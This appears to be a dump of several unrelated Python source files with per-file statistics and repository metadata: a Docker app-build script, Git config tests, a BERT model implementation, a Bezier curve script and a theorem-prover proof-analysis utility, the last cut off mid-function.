if labels:
label_str = 'LABEL '
for key in labels:
label_str += key + '="' + labels[key] + '" '
d.write(label_str + "\n")
appdef['name'] = metadata['app_name']
appdef['description'] = metadata['app_description']
if not metadata['desktop_mode']:
del appdef['commands']['server']
if not metadata['batch_mode']:
del appdef['commands']['batch']
appdef["machines"] = metadata["machines"]
for target_platform in target_platforms:
if target_platform not in appdef['machines']:
appdef['machines'].append(target_platform)
with open(path + '/AppDef.json', "w") as d:
json.dump(appdef, d, indent=4)
#Build application
print("Build docker image: " + post_processors['repository'] + ":" + post_processors["tag"])
subprocess.check_call(
"docker build -t " + post_processors['repository'] + ":" + post_processors["tag"] + " " + path,
stderr=subprocess.STDOUT, shell=True)
if post_processors['push_after_build']:
print("docker push " + post_processors['repository'] + ":" + post_processors["tag"])
subprocess.check_call("docker push " + post_processors['repository'] + ":" + post_processors["tag"],
stderr=subprocess.STDOUT, shell=True)
else:
print("Push docker image by running:")
print(" docker push " + post_processors['repository'] + ":" + post_processors["tag"])
print("Build history: " + path)
print("Build successfully!")
exit(0)
| 35.93401 | 149 | 0.63314 | 927 | 7,079 | 4.700108 | 0.212513 | 0.028919 | 0.016525 | 0.029378 | 0.257058 | 0.2084 | 0.172366 | 0.172366 | 0.141611 | 0.110627 | 0 | 0.021598 | 0.215143 | 7,079 | 196 | 150 | 36.117347 | 0.762599 | 0.011019 | 0 | 0.09434 | 0 | 0.025157 | 0.268687 | 0.025439 | 0.006289 | 0 | 0 | 0 | 0 | 1 | 0.012579 | false | 0 | 0.044025 | 0 | 0.056604 | 0.075472 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87eec95baa5133ac04a6e1c623bd5692ffa3a78 | 2,509 | py | Python | tests/test_git.py | wildfish/sphinx-gitref | 882b46441b5330206b68883b7f25ebb902abc8e7 | [
"BSD-3-Clause"
] | 5 | 2020-06-26T15:42:47.000Z | 2022-03-19T16:31:06.000Z | tests/test_git.py | wildfish/sphinx-gitref | 882b46441b5330206b68883b7f25ebb902abc8e7 | [
"BSD-3-Clause"
] | 7 | 2020-08-11T14:27:52.000Z | 2022-03-21T15:54:41.000Z | tests/test_git.py | wildfish/sphinx-gitref | 882b46441b5330206b68883b7f25ebb902abc8e7 | [
"BSD-3-Clause"
] | 1 | 2022-03-21T15:54:53.000Z | 2022-03-21T15:54:53.000Z | """
Check local repo management
"""
import pytest
from sphinx_gitref.git import Repo
from .common import GIT_CONFIG
@pytest.fixture()
def paths(tmp_path):
class paths:
root = tmp_path
# Git
git = tmp_path / ".git"
config = tmp_path / ".git" / "config"
head = tmp_path / ".git" / "HEAD"
paths.git.mkdir()
return paths
def test_dir_does_not_exist__fails_silently(paths):
paths.git.rmdir()
repo = Repo(paths.git)
assert repo.path is None
assert repo.get_remote_url() is None
assert repo.get_local_branch() is None
def test_config_does_not_exist__fails_silently(paths):
repo = Repo(paths.git)
assert repo.path == paths.git
assert repo.get_remote_url() is None
def test_head_does_not_exist__fails_silently(paths):
repo = Repo(paths.git)
assert repo.path == paths.git
assert repo.get_local_branch() is None
def test_config_exists__origin_found(paths):
paths.config.write_text(GIT_CONFIG)
repo = Repo(paths.git)
assert repo.get_remote_url() == "git@github.com:wildfish/sphinx_gitref.git"
def test_config_valid_but_without_origin__fails_silently(paths):
paths.config.write_text(GIT_CONFIG.replace("github.com", "example.com"))
repo = Repo(paths.git)
assert repo.get_remote_url() == "git@example.com:wildfish/sphinx_gitref.git"
def test_config_valid_but_with_unknown_origin__fails_silently(paths):
paths.config.write_text(
u"""[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[branch "master"]
remote = origin
merge = refs/heads/master
"""
)
repo = Repo(paths.git)
assert repo.get_remote_url() is None
def test_config_invalid__fails_loudly(paths):
try:
from configparser import MissingSectionHeaderError
except ImportError:
from ConfigParser import MissingSectionHeaderError
paths.config.write_text(u"invalid")
repo = Repo(paths.git)
with pytest.raises(MissingSectionHeaderError):
repo.get_remote_url()
def test_head_invalid__fails_silently(paths):
paths.config.write_text(GIT_CONFIG)
paths.head.write_text(u"invalid\n")
repo = Repo(paths.git)
assert repo.get_local_branch() is None
def test_head_valid__returns_branch_name(paths):
paths.config.write_text(GIT_CONFIG)
paths.head.write_text(u"ref: refs/heads/master\n")
repo = Repo(paths.git)
assert repo.get_local_branch() == "master"
| 25.602041 | 80 | 0.707852 | 344 | 2,509 | 4.872093 | 0.223837 | 0.062053 | 0.083532 | 0.107399 | 0.572196 | 0.547136 | 0.529236 | 0.474344 | 0.444511 | 0.403938 | 0 | 0.000494 | 0.192507 | 2,509 | 97 | 81 | 25.865979 | 0.826752 | 0.012754 | 0 | 0.338983 | 0 | 0 | 0.075871 | 0.036612 | 0 | 0 | 0 | 0 | 0.20339 | 1 | 0.169492 | false | 0 | 0.101695 | 0 | 0.372881 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87f6f5da0627ec3f2dddacf104d617ea49c7ca2 | 16,502 | py | Python | fastNLP/models/bert.py | awesome-archive/fastNLP | 767e7971e542783c0129ed88b7d871db775e653e | [
"Apache-2.0"
] | 1 | 2019-04-26T07:54:34.000Z | 2019-04-26T07:54:34.000Z | fastNLP/models/bert.py | machao326/fastNLP | 0f8bed739c71e3f834f213e45dc1694f8b61e74d | [
"Apache-2.0"
] | null | null | null | fastNLP/models/bert.py | machao326/fastNLP | 0f8bed739c71e3f834f213e45dc1694f8b61e74d | [
"Apache-2.0"
] | null | null | null | """
bert.py is modified from huggingface/pytorch-pretrained-BERT, which is licensed under the Apache License 2.0.
"""
import copy
import json
import math
import os
import torch
from torch import nn
CONFIG_FILE = 'bert_config.json'
MODEL_WEIGHTS = 'pytorch_model.bin'
def gelu(x):
return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))
def swish(x):
return x * torch.sigmoid(x)
ACT2FN = {"gelu": gelu, "relu": torch.nn.functional.relu, "swish": swish}
class BertLayerNorm(nn.Module):
def __init__(self, hidden_size, eps=1e-12):
super(BertLayerNorm, self).__init__()
self.weight = nn.Parameter(torch.ones(hidden_size))
self.bias = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = eps
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.weight * x + self.bias
class BertEmbeddings(nn.Module):
def __init__(self, vocab_size, hidden_size, max_position_embeddings, type_vocab_size, hidden_dropout_prob):
super(BertEmbeddings, self).__init__()
self.word_embeddings = nn.Embedding(vocab_size, hidden_size)
self.position_embeddings = nn.Embedding(max_position_embeddings, hidden_size)
self.token_type_embeddings = nn.Embedding(type_vocab_size, hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = BertLayerNorm(hidden_size, eps=1e-12)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, input_ids, token_type_ids=None):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
words_embeddings = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = words_embeddings + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
class BertSelfAttention(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob):
super(BertSelfAttention, self).__init__()
if hidden_size % num_attention_heads != 0:
raise ValueError(
"The hidden size (%d) is not a multiple of the number of attention "
"heads (%d)" % (hidden_size, num_attention_heads))
self.num_attention_heads = num_attention_heads
self.attention_head_size = int(hidden_size / num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(hidden_size, self.all_head_size)
self.key = nn.Linear(hidden_size, self.all_head_size)
self.value = nn.Linear(hidden_size, self.all_head_size)
self.dropout = nn.Dropout(attention_probs_dropout_prob)
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(self, hidden_states, attention_mask):
mixed_query_layer = self.query(hidden_states)
mixed_key_layer = self.key(hidden_states)
mixed_value_layer = self.value(hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
# Apply the attention mask is (precomputed for all layers in BertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
return context_layer
class BertSelfOutput(nn.Module):
def __init__(self, hidden_size, hidden_dropout_prob):
super(BertSelfOutput, self).__init__()
self.dense = nn.Linear(hidden_size, hidden_size)
self.LayerNorm = BertLayerNorm(hidden_size, eps=1e-12)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class BertAttention(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
super(BertAttention, self).__init__()
self.self = BertSelfAttention(hidden_size, num_attention_heads, attention_probs_dropout_prob)
self.output = BertSelfOutput(hidden_size, hidden_dropout_prob)
def forward(self, input_tensor, attention_mask):
self_output = self.self(input_tensor, attention_mask)
attention_output = self.output(self_output, input_tensor)
return attention_output
class BertIntermediate(nn.Module):
def __init__(self, hidden_size, intermediate_size, hidden_act):
super(BertIntermediate, self).__init__()
self.dense = nn.Linear(hidden_size, intermediate_size)
self.intermediate_act_fn = ACT2FN[hidden_act] \
if isinstance(hidden_act, str) else hidden_act
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
class BertOutput(nn.Module):
def __init__(self, hidden_size, intermediate_size, hidden_dropout_prob):
super(BertOutput, self).__init__()
self.dense = nn.Linear(intermediate_size, hidden_size)
self.LayerNorm = BertLayerNorm(hidden_size, eps=1e-12)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class BertLayer(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob,
intermediate_size, hidden_act):
super(BertLayer, self).__init__()
self.attention = BertAttention(hidden_size, num_attention_heads, attention_probs_dropout_prob,
hidden_dropout_prob)
self.intermediate = BertIntermediate(hidden_size, intermediate_size, hidden_act)
self.output = BertOutput(hidden_size, intermediate_size, hidden_dropout_prob)
def forward(self, hidden_states, attention_mask):
attention_output = self.attention(hidden_states, attention_mask)
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
class BertEncoder(nn.Module):
def __init__(self, num_hidden_layers, hidden_size, num_attention_heads, attention_probs_dropout_prob,
hidden_dropout_prob,
intermediate_size, hidden_act):
super(BertEncoder, self).__init__()
layer = BertLayer(hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob,
intermediate_size, hidden_act)
self.layer = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_hidden_layers)])
def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):
all_encoder_layers = []
for layer_module in self.layer:
hidden_states = layer_module(hidden_states, attention_mask)
if output_all_encoded_layers:
all_encoder_layers.append(hidden_states)
if not output_all_encoded_layers:
all_encoder_layers.append(hidden_states)
return all_encoder_layers
class BertPooler(nn.Module):
def __init__(self, hidden_size):
super(BertPooler, self).__init__()
self.dense = nn.Linear(hidden_size, hidden_size)
self.activation = nn.Tanh()
def forward(self, hidden_states):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token.
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
class BertModel(nn.Module):
"""Bidirectional Embedding Representations from Transformers.
If you want to use pre-trained weights, please download from the following sources provided by pytorch-pretrained-BERT.
sources::
'bert-base-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased.tar.gz",
'bert-large-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased.tar.gz",
'bert-base-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased.tar.gz",
'bert-large-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased.tar.gz",
'bert-base-multilingual-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-uncased.tar.gz",
'bert-base-multilingual-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-cased.tar.gz",
'bert-base-chinese': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-chinese.tar.gz",
Construct a BERT model with pre-trained weights::
model = BertModel.from_pretrained("path/to/weights/directory")
"""
def __init__(self, vocab_size,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02, **kwargs):
super(BertModel, self).__init__()
self.embeddings = BertEmbeddings(vocab_size, hidden_size, max_position_embeddings,
type_vocab_size, hidden_dropout_prob)
self.encoder = BertEncoder(num_hidden_layers, hidden_size, num_attention_heads,
attention_probs_dropout_prob, hidden_dropout_prob, intermediate_size,
hidden_act)
self.pooler = BertPooler(hidden_size)
self.initializer_range = initializer_range
self.apply(self.init_bert_weights)
def init_bert_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.initializer_range)
elif isinstance(module, BertLayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
def forward(self, input_ids, token_type_ids=None, attention_mask=None, output_all_encoded_layers=True):
if attention_mask is None:
attention_mask = torch.ones_like(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = extended_attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
embedding_output = self.embeddings(input_ids, token_type_ids)
encoded_layers = self.encoder(embedding_output,
extended_attention_mask,
output_all_encoded_layers=output_all_encoded_layers)
sequence_output = encoded_layers[-1]
pooled_output = self.pooler(sequence_output)
if not output_all_encoded_layers:
encoded_layers = encoded_layers[-1]
return encoded_layers, pooled_output
@classmethod
def from_pretrained(cls, pretrained_model_dir, state_dict=None, *inputs, **kwargs):
# Load config
config_file = os.path.join(pretrained_model_dir, CONFIG_FILE)
config = json.load(open(config_file, "r"))
# config = BertConfig.from_json_file(config_file)
# logger.info("Model config {}".format(config))
# Instantiate model.
model = cls(*inputs, **config, **kwargs)
if state_dict is None:
weights_path = os.path.join(pretrained_model_dir, MODEL_WEIGHTS)
state_dict = torch.load(weights_path)
old_keys = []
new_keys = []
for key in state_dict.keys():
new_key = None
if 'gamma' in key:
new_key = key.replace('gamma', 'weight')
if 'beta' in key:
new_key = key.replace('beta', 'bias')
if new_key:
old_keys.append(key)
new_keys.append(new_key)
for old_key, new_key in zip(old_keys, new_keys):
state_dict[new_key] = state_dict.pop(old_key)
missing_keys = []
unexpected_keys = []
error_msgs = []
# copy state_dict so _load_from_state_dict can modify it
metadata = getattr(state_dict, '_metadata', None)
state_dict = state_dict.copy()
if metadata is not None:
state_dict._metadata = metadata
def load(module, prefix=''):
local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
module._load_from_state_dict(
state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)
for name, child in module._modules.items():
if child is not None:
load(child, prefix + name + '.')
load(model, prefix='' if hasattr(model, 'bert') else 'bert.')
if len(missing_keys) > 0:
print("Weights of {} not initialized from pretrained model: {}".format(
model.__class__.__name__, missing_keys))
if len(unexpected_keys) > 0:
print("Weights from pretrained model not used in {}: {}".format(
model.__class__.__name__, unexpected_keys))
return model
| 45.460055 | 130 | 0.682705 | 2,084 | 16,502 | 5.099808 | 0.162668 | 0.038577 | 0.025593 | 0.02277 | 0.387279 | 0.33694 | 0.292153 | 0.260726 | 0.239838 | 0.214057 | 0 | 0.008793 | 0.228154 | 16,502 | 362 | 131 | 45.585635 | 0.825626 | 0.165919 | 0 | 0.144 | 0 | 0 | 0.020257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112 | false | 0 | 0.024 | 0.008 | 0.24 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e888a99a1b09352657478ab95875d5c3214b8a31 | 3,597 | py | Python | Yan/code/Bezier/Bezier_n.py | william-yan/CSU_notes | c2b7fb3dea5a6435bf9dbadaad479b06c9297fcb | [
"MIT"
] | null | null | null | Yan/code/Bezier/Bezier_n.py | william-yan/CSU_notes | c2b7fb3dea5a6435bf9dbadaad479b06c9297fcb | [
"MIT"
] | null | null | null | Yan/code/Bezier/Bezier_n.py | william-yan/CSU_notes | c2b7fb3dea5a6435bf9dbadaad479b06c9297fcb | [
"MIT"
] | 2 | 2019-04-26T02:50:00.000Z | 2019-04-28T13:53:48.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 25 16:40:54 2019
@author: self-driver
"""
import numpy as np
from matplotlib import pyplot as plt
import Bezier
def bezier_n_curve(points, n, nTimes=1000):
#print("points is : \n",points)
#print(" n is : ",n)
np.set_printoptions(formatter={'float': '{: 0.3f}'.format})
print("points is : \n",points)
nPoints = len(points)
count = 0
if((nPoints - 1)%n):
count = n - (nPoints - 1)%n
print('count is : ',count)
# insert Point
'''
while(count):
points_insert = points[-1]+(points[-1]-points[-2])*0.1*count
points = np.insert(points,len(points),values=points_insert, axis=0)
count = count - 1
'''
result = np.transpose(points);
result_D = np.transpose(points);
D = [0]
for i in range(0,len(points)-1,n):
end_selesct = i+n+1
Path_selct = points[i:end_selesct]
#print("Path_selct before is : \n",Path_selct)
'''
if (i+n+2) < (len(points)):
point_insert_front = (points[i] + points[i+1])/2
point_insert_rear = (Path_selct[-1] + Path_selct[-2])/2
x = point_insert_rear[0]
x1 = points[end_selesct-1][0]
x2 = points[end_selesct][0]
y1 = points[end_selesct-1][1]
y2 = points[end_selesct][1]
point_insert_rear[1] = (y2-y1)/(x2-x1)*(x-x1) + y1
Path_selct = np.insert(Path_selct,1,values=point_insert_front, axis=0)
Path_selct = np.insert(Path_selct,-1,values=point_insert_rear, axis=0)
else:
point_insert_front = (points[i] + points[i+1])/2
point_insert_rear = (Path_selct[-1] + Path_selct[-2])/2
Path_selct = np.insert(Path_selct,1,values=point_insert_front, axis=0)
Path_selct = np.insert(Path_selct,-1,values=point_insert_rear, axis=0)
'''
tempresult = Bezier.bezier_curve(Path_selct,nTimes)
tempresult_D1 = np.array([Bezier.bezier_curve(Path_selct[:-2],nTimes)])
tempresult_D2 = np.array([Bezier.bezier_curve(Path_selct[1:],nTimes)])
tempresult_D = tempresult_D2 - tempresult_D1
print("tempresult_D.shape",tempresult_D.shape)
for i in range (100):
D.append(tempresult_D[0][1][i]/tempresult_D[0][1][i])
result = np.c_[result,tempresult]
result_D = np.append(result_D,tempresult_D)
print("Path_selct\n",Path_selct)
#print("Path_selct_D\n",Path_select_D)
x_re = result[0][len(points):-1]
y_re = result[1][len(points):-1]
print("D is : \n",result_D)
plt.figure(2)
#D = np.array(bezierPoint[2])
plt.plot(D[1:],'k.')
print("x_re.shape",x_re.shape)
#print("D.shape",D.shape)
return x_re,y_re,D[1:]
if __name__ == "__main__":
a0 = 1
a1 = 0.5
a2 = -0.01
a3 = 0.000001
x = np.linspace(0,20,10)
y = a0 + a1 * x + a2 * x**2 + a3 * x ** 3
Path = np.array([x,y])
Path = np.transpose(Path)
n = 10
bezierPoint = bezier_n_curve(Path, n, 100)
plt.figure(1)
plt.plot(x,y,'ro')
plt.axis("equal")
plt.plot(bezierPoint[0],bezierPoint[1],'r.')
Path_D= np.array([bezierPoint[0]])
Path_D = a1 + 2 * a2 * bezierPoint[0] + 3 * a3 *bezierPoint[0]**2
plt.figure(2)
#D = np.array(bezierPoint[2])
#print(bezierPoint[2])
#plt.plot(bezierPoint[0], D,'k.')
plt.plot(bezierPoint[0],Path_D,'r.')
| 29.483607 | 82 | 0.565749 | 528 | 3,597 | 3.679924 | 0.200758 | 0.097272 | 0.036027 | 0.034997 | 0.293361 | 0.244982 | 0.244982 | 0.211014 | 0.180134 | 0.180134 | 0 | 0.054219 | 0.271893 | 3,597 | 121 | 83 | 29.727273 | 0.687667 | 0.107312 | 0 | 0.037736 | 0 | 0 | 0.052838 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018868 | false | 0 | 0.056604 | 0 | 0.09434 | 0.132075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88a075f5e5b1b0ce9438ee6f40cae107e654a0d | 9,835 | py | Python | deepmath/deephol/utilities/proof_analysis.py | LaudateCorpus1/deepmath | b5b721f54de1d5d6a02d78f5da5995237f9995f9 | [
"Apache-2.0"
] | 830 | 2016-11-07T21:46:27.000Z | 2022-03-23T08:01:03.000Z | deepmath/deephol/utilities/proof_analysis.py | LaudateCorpus1/deepmath | b5b721f54de1d5d6a02d78f5da5995237f9995f9 | [
"Apache-2.0"
] | 26 | 2016-11-07T22:06:31.000Z | 2022-02-16T00:18:29.000Z | deepmath/deephol/utilities/proof_analysis.py | LaudateCorpus1/deepmath | b5b721f54de1d5d6a02d78f5da5995237f9995f9 | [
"Apache-2.0"
] | 168 | 2016-11-07T21:48:55.000Z | 2022-03-19T02:47:14.000Z | """This file contains utilities for analyze proofs exported by the prover.
The most important function here is a utility that creates an acyclic subgraph
of the proof graph that explains why a proof is correct.
"""
from __future__ import absolute_import
from __future__ import division
# Import Type Annotations
from __future__ import print_function
import tensorflow as tf
from typing import List, Optional, Tuple, Text
from deepmath.deephol import deephol_pb2
from deepmath.proof_assistant import proof_assistant_pb2
class GoalNotFoundError(Exception):
"""Raised when the goal is not found or not proven."""
def __init__(self, goal: Text):
super(GoalNotFoundError, self).__init__()
self.goal = goal
def _thm_string(thm: proof_assistant_pb2.Theorem) -> Text:
"""Turn theorem into a string for unique representation.
Args:
thm: Theorem to be turned into a string.
Returns:
string: Joined hypotheses and conclusion.
"""
return '|:|'.join([str(hyp) for hyp in thm.hypotheses] +
[str(thm.conclusion)])
class Node(object):
"""Temporary node object for proof analysis."""
def __init__(self, node: deephol_pb2.ProofNode, index: int):
# The corresponding proof node.
self.node = node
# The index of the node in the ProofLog.
self.index = index
# A map from index to TacticApplication of successful tactic applications.
self.proofs = {}
# None or the real explanation for the correctness of the node.
# This proof should not be part of any circular reasoning.
self.true_proof = -1
# Closed: whether this was node was successfully closed in this analysis.
self.closed = False
# List of (ProofNode, int) pairs, corresponding to the tactic application
# this node is supposed to be helpful to prove.
self.parents = []
# Processed: marks the proof to be processed for the final output.
self.processed = False
# Unfortunately, ptype does not allow to use "Node" in tactic applications
# until the whole class is fully defined.
def update_parents(self, goal_to_node, closed_nodes):
"""Create the parents arrays and mark leaf nodes as closed.
This method must be called exactly once for each node marked as closed in
the proof tree.
Whenever a node is closed it closes additional parent nodes. This
information is propagated to the parent nodes and the tactic application
is marked as true proof of the parent if that closes in this turn.
This method collects all the leaf nodes (those nodes with a tactic
application without subgoal in the closed_nodes list).
Args:
goal_to_node: Callable[[proof_assistant_pb2.Theorem], Node] that finds a
node based on its goal.
closed_nodes: The list of node that got closed in the order of their
closing, of type List[Node].
"""
for i, proof in enumerate(self.node.proofs):
if proof.result == deephol_pb2.TacticApplication.SUCCESS:
if not proof.subgoals:
assert proof.closed, str(proof)
self.true_proof = i
self.closed = True
closed_nodes.append(self)
self.proofs[i] = []
return
for i, proof in enumerate(self.node.proofs):
if proof.closed:
proof = [goal_to_node(subgoal) for subgoal in proof.subgoals]
self.proofs[i] = proof
for node in proof:
node.parents.append((self, i))
def update_closed(self, closed_nodes):
"""Propagate the true reason and closed flags to the parents of a proof.
Args:
closed_nodes: The list of nodes that has been closed so far of type
List[Node].
"""
assert self.true_proof >= 0
assert self.closed
for parent, proof_id in self.parents:
if parent.closed:
continue
proof = parent.proofs[proof_id]
parent.proofs[proof_id] = [n for n in proof if n.index != self.index]
if not parent.proofs[proof_id]:
parent.true_proof = proof_id
parent.closed = True
closed_nodes.append(parent)
parent.update_closed(closed_nodes)
def find_reasons(
proof_log: deephol_pb2.ProofLog
) -> Optional[Tuple[List[Tuple[int, int, List[int]]], List[int]]]:
"""Find the real reasons why the root node of a proof is is proved.
This function assumes that the root node is closed, otherwise an
error message is displayed and None is returned.
Args:
proof_log: Proof log to be analyzed.
Returns:
A pair of (reasons, sorting), where reasons is a list of (int, list of int),
representing the acyclic hypergraph that explains why the proof node is
closed. Each (i, js) in this list represents a TacticApplication for node
with index i, and js is the list of node indices to which the
TacticApplication refers to. All nodes are represented by their index in
the proof_log.nodes list.
The sorting represents a topological sorting of all the nodes that
contribute to the above proof. This list starts with the theorem nodes and
the subgoals always come after the nodes they prove.
"""
# A map that maps the string representation of proof_assistant_pb2.Theorems to
# their nodes. It stores only those nodes that are marked to be proved.
thm_node = {}
# Node objects corresponding to the root of the proof log. The roots should
# be marked as THEOREM.
to_process = []
def goal_to_node(thm):
thm_str = _thm_string(thm)
node = thm_node.get(thm_str, None)
if node is None:
raise GoalNotFoundError(thm_str)
return node
# Create the mapping that maps theorem representations to Node.
# Also updates the list of nodes for which the proofs should be reconstructed.
for i, node in enumerate(proof_log.nodes):
if node.status == deephol_pb2.ProofNode.PROVED:
ths = _thm_string(node.goal)
if ths in thm_node:
other = thm_node[ths]
other.node.proofs.extend(node.proofs)
continue
n = Node(node, i)
thm_node[ths] = n
if node.goal.tag == proof_assistant_pb2.Theorem.THEOREM:
to_process.append(n)
if not to_process:
# We don't have anything to prove, so we just return an empty reasons and
# an empty nodes list.
return ([], [])
closed = []
# Initialize the parent node information and mark leaf nodes to be proved.
try:
for node in sorted(thm_node.values(), key=lambda n: n.index):
node.update_parents(goal_to_node, closed)
if not closed:
tf.logging.error('There are no closed leafs (tactic applications without '
'subgoals .')
return None
except GoalNotFoundError as xcp:
tf.logging.error(
'Could not find subgoal "%s" of closed proof among closed '
'nodes.', xcp.goal)
return None
i = 0
# We mark the true reason for being closed backwards from the leaf nodes.
while i < len(closed):
closed[i].update_closed(closed)
i += 1
for n in to_process:
if not n.closed:
tf.logging.error('Root %d is marked closed, but it does not check out.',
n.index)
return None
n.processed = True
# Collect the reasons for all the nodes in a BFS manner starting from the
# theorem nodes.
reasons = []
i = 0
while i < len(to_process):
node = to_process[i]
i += 1
if node.true_proof < 0 or not node.closed:
tf.logging.error('Node %d has no true proof, but it is marked proved.', i)
return None
proof = node.node.proofs[node.true_proof]
try:
subgoals = [goal_to_node(subgoal) for subgoal in proof.subgoals]
except GoalNotFoundError as xcp:
tf.logging.error('Could not find subgoal "%s" among proved nodes',
xcp.goal)
return None
reasons.append((node.index, node.true_proof,
